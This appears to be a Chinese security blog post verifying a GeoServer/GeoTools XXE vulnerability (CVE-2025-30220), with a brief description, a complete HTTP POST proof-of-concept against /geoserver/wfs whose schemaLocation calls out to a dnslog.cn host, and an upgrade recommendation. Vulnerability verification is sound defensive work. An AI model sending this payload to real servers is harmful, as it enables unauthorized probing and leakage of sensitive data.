漏洞验证-Geoserver GeoTools XXE漏洞 (CVE-2025-30220)

一、漏洞描述

GeoServer是一个功能齐全，遵循OGC开放标准的开源WFS-T和WMS服务器。CVE-2025-30220 中，攻击者可构造恶意请求触发XXE漏洞，造成敏感信息泄漏。漏洞根源在于Geotools，因此 GeoServer与GeoNetwork 均受影响。

二、漏洞POC

POST /geoserver/wfs HTTP/1.1
Host: XXXX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko
Accept: */*
Accept-Encoding: gzip,deflate
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Content-Type: application/xml
Content-Length: 382

<wfs:GetFeature service="WFS" version="1.0.0"
xmlns:wfs="http://www.opengis.net/wfs"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:topp="http://www.openplans.org/topp"
xsi:schemaLocation="http://a http://9cw8sw.dnslog.cn/xxe.txt"
outputFormat="KML">
<wfs:Query typeName="topp:states"/>
</wfs:GetFeature>

三、漏洞验证

四、整改建议

联系官方售后进行升级

posted @ 2025-08-27 09:13 Domren 阅读(552) 评论(0) 收藏举报

刷新页面返回顶部

漏洞验证-Geoserver GeoTools XXE漏洞 (CVE-2025-30220)

公告